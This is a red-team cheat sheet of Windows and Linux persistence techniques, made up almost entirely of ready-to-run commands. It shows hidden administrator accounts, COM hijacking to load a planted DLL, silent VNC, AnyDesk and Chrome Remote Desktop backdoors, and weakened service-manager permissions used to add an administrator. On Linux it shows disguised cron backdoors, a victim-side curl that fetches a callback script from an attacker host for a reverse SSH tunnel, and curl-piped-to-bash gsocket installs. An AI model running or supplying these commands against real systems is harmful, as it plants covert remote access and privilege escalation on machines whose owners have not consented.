Persistence

https://xakep.ru/2021/03/03/persistence-cheatsheet/

Windows

https://persistence-info.github.io/

Scheduled Tasks

https://github.com/VirtualAlllocEx/Taskschedule-Persistence-Download-Cradles

Hidden Local User

Dollar Sign

https://chaah.awankloud.my/redteaming-tips-creating-a-hidden-user/

Cmd > net1.exe user snovvcrash$ Passw0rd! /add

SpecialAccounts

PS > New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name SpecialAccounts
PS > New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\" -Name snovvcrash -PropertyType DWORD -Value 0 -Force

Suborner

PS > whoami
nt authority\system
PS > .\Suborner.exe /username:snovvcrash$ /password:Passw0rd!

COM Hijacking

Locate good targets to hijack with Procmon filters:

Operation is RegOpenKey
Result is NAME NOT FOUND
Path is InprocServer32 (in-process server allowing the specified DLL to be loaded into current process memory space)

Locate CLSIDs from scheduled tasks:

schtask.ps1

$Tasks = Get-ScheduledTask

foreach ($Task in $Tasks)
{
  if ($Task.Actions.ClassId -ne $null)
  {
    if ($Task.Triggers.Enabled -eq $true)
    {
      if ($Task.Principal.GroupId -eq "Users")
      {
        Write-Host "Task Name: " $Task.TaskName
        Write-Host "Task Path: " $Task.TaskPath
        Write-Host "CLSID: " $Task.Actions.ClassId
        Write-Host
      }
    }
  }
}

Check if a COM component exists under a relevant registry hive by its CLSID:

PS > Get-ChildItem -Path "Registry::HKCR\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
PS > Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
PS > Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize

If it exists under HKLM but does not exists under HKCU hive, we can hijack this COM component by creating a new item in the latter path:

PS > New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
PS > New-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -Name "InprocServer32" -Value "C:\Windows\Tasks\evil.dll"
PS > New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32" -Name "ThreadingModel" -Value "Both"
PS > Get-ItemProperty -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32"

RID Hijacking

.LNK Shortcuts

VNC

TigerVNC (WinVNC)

TightVNC

Download and unpack MSI:

curl https://www.tightvnc.com/download/2.8.85/tightvnc-2.8.85-gpl-setup-64bit.msi -o tightvnc.msi
msiexec /qb /a tightvnc.msi TARGETDIR=%cd%\TightVNC
move TightVNC\PFiles\TightVNC\tvnserver.exe .
move TightVNC\PFiles\TightVNC\screenhooks32.dll .
rmdir TightVNC /s /q
del tightvnc.msi

Create a password (8 chars):

printf "PASSWOR\0" | openssl enc -des-cbc --nopad --nosalt -K 0123456789abcdef -iv 0000000000000000 -provider legacy -provider default | xxd -p
f408495e54374919

Install Vinagre client:

wget http://ftp.de.debian.org/debian/pool/main/v/vinagre/vinagre_3.22.0-8.1_amd64.deb
sudo apt install ./vinagre_3.22.0-8.1_amd64.deb && rm vinagre_3.22.0-8.1_amd64.deb

Install TightVNC server:

New-Item -Path "HKLM:\Software\TightVNC" -Force > $null
New-Item -Path "HKLM:\Software\TightVNC\Server" -Force > $null

Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "Password" -Value ([byte[]](0xf4,0x08,0x49,0x5e,0x54,0x37,0x49,0x19)) -Type Binary -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RfbPort" -Value 31337 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RunControlInterface" -Value 0 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RemoveWallpaper" -Value 0 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "AcceptHttpConnections" -Value 0 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "LoopbackOnly" -Value 0 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "AllowLoopback" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RunAsService" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "ServiceDisplayName" -Value "TightVNC Server" -Type String -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "UseVncAuthentication" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "UseControlAuthentication" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "QueryAcceptOnTimeout" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "QueryTimeout" -Value 10 -Type DWord -Force

# cd C:\path\to\tvnserver_exe\and\screenhooks32_dll
Start-Process -FilePath .\tvnserver.exe -ArgumentList "-install -silent" -NoNewWindow -Wait
Start-Service -Name "TightVNC Server"
Get-Service "TightVNC Server"

Uninstall TightVNC server:

# cd C:\path\to\tvnserver_exe\and\screenhooks32_dll
Start-Process -FilePath .\tvnserver.exe -ArgumentList "-remove -silent" -NoNewWindow -Wait
Get-Service "TightVNC Server"
Remove-Item -Path "HKLM:\Software\TightVNC" -Recurse -Force
Stop-Process -Name tvnserver -Force
rm tvnserver.exe, screenhooks32.dll

AnyDesk

Cmd > bitsadmin /transfer job1 https://download.anydesk.com/AnyDesk-CM.exe C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe
Cmd > C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe --install C:\Users\snovvcrash\AppData\Local\AnyDesk --start-with-win --silent
Cmd > del C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe
Cmd > echo Passw0rd! | C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --set-password
Cmd > cmd /c "for /f ""delims="" %i in ('C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --get-id') do echo %i"
Cmd > C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --remove

Chrome Remote Desktop

https://trustedsec.com/blog/abusing-chrome-remote-desktop-on-red-team-operations-a-practical-guide

Deploy MSI (if Chrome Remote Desktop is NOT already in use on client):

Cmd > msiexec /i https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi /qn

Backup current config (if Chrome Remote Desktop is already in use on client):

Cmd > copy /y "%PROGRAMDATA%\Google\Chrome Remote Desktop\host.json" "%PROGRAMDATA%\Google\Chrome Remote Desktop\host.json.bak"
Cmd > copy /y "%PROGRAMDATA%\Google\Chrome Remote Desktop\host_unprivileged.json" "%PROGRAMDATA%\Google\Chrome Remote Desktop\host_unprivileged.json.bak"
PS > cp -Force "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host.json" "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host.json.bak"
PS > cp -Force "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host_unprivileged.json" "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host_unprivileged.json.bak"

Cmd > "%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="<CODE>" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME% --pin=313337
PS > & "${Env:PROGRAMFILES(X86)}\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="<CODE>" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=$Env:COMPUTERNAME --pin=313337

Restore config (and lose access) if needed:

Cmd > copy /y "%PROGRAMDATA%\Google\Chrome Remote Desktop\host_unprivileged.json.bak" "%PROGRAMDATA%\Google\Chrome Remote Desktop\host_unprivileged.json"
Cmd > copy /y "%PROGRAMDATA%\Google\Chrome Remote Desktop\host_unprivileged.json.bak" "%PROGRAMDATA%\Google\Chrome Remote Desktop\host_unprivileged.json"
PS > cp -Force "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host_unprivileged.json.bak" "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host_unprivileged.json"
PS > cp -Force "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host_unprivileged.json.bak" "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host_unprivileged.json"

Keep Awake

Disable sleep when plugged in / on battery:

Cmd > powercfg /change standby-timeout-ac 0
Cmd > powercfg /change standby-timeout-dc 0

Disable hibernate when plugged in / on battery:

Cmd > powercfg /change hibernate-timeout-ac 0
Cmd > powercfg /change hibernate-timeout-dc 0

Disable sleep when closing laptop lid (plugged in / on battery):

Cmd > powercfg -setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0
Cmd > powercfg -setdcvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0

Apply all settings:

Cmd > powercfg -SetActive SCHEME_CURRENT

Create a scheduled task to wake up:

PS > schtasks /create /tn "Microsoft\Windows\WindowsUpdate\Refresh Group Policy" /tr "cmd.exe /c exit" /sc daily /st 23:00:00 /ru "SYSTEM" /f
PS > Get-ScheduledTask -TaskName "Refresh Group Policy"
PS > $settings = New-ScheduledTaskSettingsSet -WakeToRun
PS > Set-ScheduledTask -TaskName "Refresh Group Policy" -TaskPath "Microsoft\Windows\WindowsUpdate\" -Settings $settings
PS > powercfg /waketimers

SDDL Manipulation

Backup current SDDL for scmanager:

Cmd > sc.exe sdshow scmanager

Change it to allow everyone to create a service:

Cmd > sc.exe sdset scmanager D:(A;;KA;;;WD)

Create a service that will auto run at next reboot:

Cmd > sc.exe create lpesvc displayName= "lpesvc" binPath= "C:\Windows\System32\net.exe localgroup administrators snovvcrash /add" obj= LocalSystem start= auto

Check if scmanager SDDL has been modified:

PS > ConvertFrom-SddlString -Sddl $(sc.exe sdshow scmanager | select -Last 1) | select -Expand DiscretionaryAcl

Tools

SharPersist

https://github.com/fireeye/SharPersist

beacon> execute-assembly SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <BASE64_CMD>" -n "Updater" -m add -o hourly
beacon> execute-assembly SharPersist.exe -t startupfolder -f "UserEnvSetup" -m add
beacon> execute-assembly SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

Linux

Cron

Quicky crontab without duplicating backdoor process if already running:

$ echo 'if [ -z "$(pwdx $(pgrep chisel) 2>/dev/null | grep home)" ]; then $(cd /home/user/.local/lib; export PATH=.:$PATH; exec -a "kworker/0:2-events" chisel & disown); fi' > /home/user/.local/.1
$ (crontab -l; echo '* * * * * /home/user/.local/.1') | crontab -

SSH

Add a temporary rule allowing connections from your IP:

$ sudo iptables -A INPUT -p tcp -s 10.10.13.37 --dport 22 -j ACCEPT

SSH Tunnel in Crontab

callback.sh

#!/bin/bash
if [[ `ps -ef | grep -c 2222` -eq 1 ]]; then
  /usr/bin/ssh -nNT -R 2222:localhost:22 [-oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa] [-oServerAliveInterval=300 -oServerAliveCountMax=3] -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -oIdentitiesOnly=yes -i /home/alice/.ssh/.k [email protected]
fi

Attacker's box:

$ sudo -i
# useradd -ms /bin/false nopty
# mkdir /home/nopty/.ssh
# ssh-keygen -f /home/nopty/.ssh/dummy_key -t ed25519 -q -N ""
# cat /home/nopty/.ssh/dummy_key.pub
# echo 'from="10.10.13.38",command="echo Only port forwarding is allowed",no-agent-forwarding,no-X11-forwarding,no-pty '`cat /home/nopty/.ssh/dummy_key.pub` > /home/nopty/.ssh/authorized_keys
# chown -R nopty:nopty .ssh

Victim's box:

$ curl 10.10.13.37/dummy_key > /home/alice/.ssh/.k
$ chmod 600 /home/alice/.ssh/.k
$ curl 10.10.13.37/callback.sh > /home/alice/.conf
$ chmod +x /home/alice/.conf
$ crontab -e
*/15 * * * * /home/alice/.conf

Global Socket

https://www.gsocket.io/deploy/

Install

Victim's box:

$ bash -c "$(curl -fsSL gsocket.io/x)"
$ bash -c "$(wget -qO- gsocket.io/x)"

Connect

Attacker's box:

$ cd ~/tools && bash -c "$(curl -fsSL https://tiny.cc/gsinst)" && cd
$ ~/tools/gsocket/tools/gs-netcat -s "<SECRET>" -i

Clean Up

Victim's box:

$ GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
$ GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"

$ pkill gs-bd

Rootkits

Last updated 6 months ago

hashtagWindows

hashtagScheduled Tasks

hashtagHidden Local User

hashtagDollar Sign

hashtagSpecialAccounts

hashtagSuborner

hashtagCOM Hijacking

hashtagRID Hijacking

hashtag.LNK Shortcuts

hashtagVNC

hashtagTigerVNC (WinVNC)

hashtagTightVNC

hashtagAnyDesk

hashtagChrome Remote Desktop

hashtagKeep Awake

hashtagSDDL Manipulation

hashtagTools

hashtagSharPersist

hashtagLinux

hashtagCron

hashtagSSH

hashtagSSH Tunnel in Crontab

hashtagGlobal Socket

hashtagInstall

hashtagConnect

hashtagClean Up

hashtagRootkits

Windows

Scheduled Tasks

Hidden Local User

Dollar Sign

SpecialAccounts

Suborner

COM Hijacking

RID Hijacking

.LNK Shortcuts

VNC

TigerVNC (WinVNC)

TightVNC

AnyDesk

Chrome Remote Desktop

Keep Awake

SDDL Manipulation

Tools

SharPersist

Linux

Cron

SSH

SSH Tunnel in Crontab

Global Socket

Install

Connect

Clean Up

Rootkits